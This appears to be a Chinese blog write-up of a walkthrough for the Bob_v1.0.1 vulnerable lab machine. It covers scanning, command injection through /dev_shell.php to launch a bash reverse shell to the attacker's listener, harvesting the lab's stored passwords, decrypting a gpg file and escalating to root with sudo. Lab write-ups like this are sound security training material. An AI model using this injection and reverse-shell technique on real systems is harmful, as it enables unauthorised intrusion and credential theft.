Bob_v1.0.1靶机

查看mac地址

扫描ip

端口扫描

nmap -p- -A 192.168.154.133

目录扫描

dirsearch -u http://192.168.154.133

拼接访问

访问到/dev_shell.php是有用 的

这个页面存在过滤 输入whoami | ls

访问.bak 会下载下来 查看 发现过滤的命令

尝试反弹shell

输入

whoami | pwd&echo "bash -i >& /dev/tcp/192.168.154.130/4444 0>&1" | bash

kail上进行监听4444端口

反弹成功

进行提权

cd /home 
ls
cd bob
ls -al

查看文件 得到jc和seb的密码

cat .old_passwordfile.html
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

在 Documents 下发现一个加密的文件 login.txt.gpg 和一个目录 Secret

cd Documents
ls

在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh

这是一个藏头诗,密钥为 HARPOCRATES

返回 DOcuments目录下,解密 login.txt.gpg ,没有权限

ssh登录其他用户尝试

ssh jc@192.168.111.142 -p 25468
Qwerty

解密 得到bob的密码

cd /home/bob/Documents
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
 
bob:b0bcat_

再看看 elliot 的家目录,发现一个theadminisdumb.txt 文件

查看内容,这里提到他把密码改为了 theadminisdumb

ssh连接bob用户

ssh bob@192.168.154.133 -p 25468
b0bcat_

显示为all,所有命令都可以

直接输入sudo su

成功提权

  • 10
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值